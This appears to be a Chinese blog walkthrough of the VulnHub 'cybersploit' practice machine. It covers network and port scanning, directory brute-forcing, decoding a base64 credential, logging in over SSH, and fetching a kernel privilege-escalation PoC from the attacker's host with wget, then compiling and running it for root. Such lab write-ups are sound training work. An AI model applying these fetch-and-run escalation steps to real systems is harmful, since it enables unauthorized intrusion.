今天实践的是vulnhub的cybersploit镜像,
下载地址,https://download.vulnhub.com/cybersploit/cybersploit.ova,
还是只能用virtualbox导入,做地址扫描,
sudo netdiscover -r 192.168.0.0/24,有地址了,186就是,
再继续做端口扫描,sudo nmap -sS -sV -T5 -A -p- 192.168.0.186,
有web服务,浏览器访问http://192.168.0.186,
查看页面源码,获取到用户名itsskv,
做一下目录暴破,dirb http://192.168.0.186,
浏览器访问http://192.168.0.186/robots.txt,
在线对R29vZCBXb3JrICEKRmxhZzE6IGN5YmVyc3Bsb2l0e3lvdXR1YmUuY29tL2MvY3liZXJzcGxvaXR9做base64解码,
获取到密码cybersploit{youtube.com/c/cybersploit},
ssh登录靶机,ssh [email protected],id确认不是root,需要提权,
uname -a查看内核版本是3.13.0-32-generic,
从网上搜到本地提权的poc代码,
下载到kali攻击机,改名成37292.c,kali攻击机上开启http下载服务,
python2 -m SimpHTTPServer,
在靶机上进入tmp目录,cd /tmp,
下载代码文件,wget http://192.168.0.190:8000/37292.c,
编译可执行文件,gcc 37292.c -o poc,
执行,./poc,id确认是root,
本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束,本周的实践到此结束。
原文始发于微信公众号(云计算和网络安全技术实践):vulnhub之cybersploit的实践
- 左青龙
- 微信扫一扫
- 右白虎
- 微信扫一扫
评论